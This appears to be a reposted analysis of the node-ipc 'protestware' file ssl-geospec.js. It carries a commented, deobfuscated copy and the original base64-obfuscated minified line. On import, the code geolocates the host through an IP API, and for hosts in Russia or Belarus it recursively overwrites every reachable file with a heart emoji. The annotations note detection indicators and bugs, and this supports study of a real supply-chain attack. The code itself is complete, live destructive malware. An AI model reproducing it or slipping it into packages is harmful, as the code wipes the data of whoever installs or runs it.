A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
| import u from "path"; | |
| import a from "fs"; | |
| import o from "https"; | |
| // **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.** | |
| // Obfuscated code that I deobfuscated. | |
| // I also added comments which should help explain what exactly is going on here. | |
| // Originally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist) | |
| // See you in prison, Brandom. | |
| // Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js | |
// A timeout is used to add an artificial delay (up to 1000 ms, see the second
// argument at the bottom). The timer is armed at module load, so merely
// importing this module is enough to trigger everything below — no exported
// function needs to be called.
setTimeout(function () {
  // Math.round(Math.random() * 4) yields 0..4 and only 0 and 1 fall through,
  // so the payload fires on roughly 37.5% of loads (P(0) = 1/8, P(1) = 1/4),
  // not 50%.
  const t = Math.round(Math.random() * 4);
  if (t > 1) return;
  // This URL is used to specifically target people in Russia and Belarus.
  // From a detection standpoint, an outbound HTTPS request to
  // api.ipgeolocation.io from a process with no reason to geolocate itself is
  // the observable network indicator of this payload.
  const n =
    "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  // A request is sent to the URL above. The server sends the location of the
  // requester back as JSON.
  o.get(n, function (t) {
    // NOTE(review): "data" is a stream event and can presumably fire per chunk;
    // a partial chunk would make JSON.parse below throw, and the empty catch
    // silently swallows it.
    t.on("data", function (t) {
      // Target roots: the CWD, its parent, its grandparent and the filesystem
      // root. How far "/" gets is bounded only by the process's permissions.
      const n = "./";
      const o = "../";
      const r = "../../";
      const f = "/";
      const c = "country_name";
      // Specifically targets the citizens of Russia and Belarus.
      const e = "russia";
      const i = "belarus";
      try {
        const s = JSON.parse(t);
        const u = s[c].toLowerCase();
        // "If your country is from Russia or Belarus, overwrite all of your files."
        const a = u.includes(e) || u.includes(i);
        if (a) {
          // Each call leaves h's second parameter at its default "", so no
          // file is filtered out (see h below). The returned Promises are
          // never awaited.
          h(n);
          h(o);
          h(r);
          h(f);
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
/**
 * Recursively overwrites every non-directory entry under `n` with a heart
 * emoji.
 *
 * @param n The directory to start from, relative to the CWD of the process
 *   that imported this module. Defaults to "" — `existsSync("")` is false, so
 *   a bare call is a no-op.
 * @param o A substring filter on the joined path. Presumably meant to be used
 *   recursively; every caller leaves it at the default "", and
 *   `indexOf("") >= 0` is always true, so the filter never excludes anything.
 * @returns A Promise resolving to `f`, which in practice is always empty (see
 *   the note on the recursive call below). No caller uses the result.
 */
// The function that does the overwriting. It is declared `async` but contains
// no `await`, so its whole body runs synchronously on the caller's stack; the
// only effect of `async` is that the return value is wrapped in a Promise.
async function h(n = "", o = "") {
  // Checks to see if the directory within your file system exists.
  if (!a.existsSync(n)) return;
  let r = [];
  try {
    // Gets all of the entries within the directory.
    r = a.readdirSync(n);
  } catch (t) {} // e.g. permission denied: the directory is silently skipped.
  const f = [];
  // Your files will get overwritten with a heart emoji. Perfect.
  const c = "❤️";
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    // If the entry is a directory, it will run the `h` function again.
    // lstat does not follow symlinks, so a symlinked directory is not
    // descended into.
    if (t.isDirectory()) {
      const s = h(i, o);
      // `s` is a Promise (h is async), so `s.length` is undefined and nothing
      // is ever pushed — `f` stays empty. The recursive call itself still ran
      // to completion synchronously, so subdirectories are affected; only the
      // (unused) return-value aggregation is broken.
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        // The files get overwritten. Thanks, Brandon.
        // fs.writeFile is fire-and-forget here: the no-op callback discards
        // any error and nothing waits for completion, so failures are invisible.
        a.writeFile(i, c, function () {});
      } catch (t) {}
    }
  }
  return f;
}
// Fake exports probably intended to trick consumers: the only public surface
// is a constant `true`, so the module looks harmless to anything inspecting
// what it exports.
export const ssl = true;
export default ssl;
// Original minified form as shipped. Every string literal (the geolocation
// URL, the four target roots, "country_name", the two country names and the
// heart emoji) is base64-encoded and decoded with Buffer.from(..., "base64")
// at run time, so a plain-text grep for the URL or country names would miss
// it; the base64 literals in this line are the stable strings to search a
// dependency tree for when checking whether this payload is present.
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
Or Gitpod for the curious ones.
The API key isn't valid anymore:
{"message":"Provided API key is not valid. Contact technical support for assistance at [email protected]"} // Again, the function was async. This will not even work properly.
`s.length > 0 ? f.push(...s) : null;` — leave it to your average JS dev to not even be able to write functional malware.
Don’t run it on the host; run it in a container.